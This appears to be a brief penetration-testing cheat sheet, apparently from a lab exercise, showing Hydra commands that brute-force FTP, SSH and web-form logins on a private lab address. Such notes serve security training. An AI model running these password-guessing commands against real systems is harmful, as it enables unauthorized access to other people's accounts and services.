hydra | Kali Linux Tools
FTP Bruteforce
hydra -l user -P passlist.txt ftp://10.10.86.138
SSH Bruteforce
hydra -l <username> -P <full path to pass> 10.10.86.138 -t 4 ssh
Bruteforce web credentials
hydra -l <username> -P <wordlist> 10.10.86.138 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V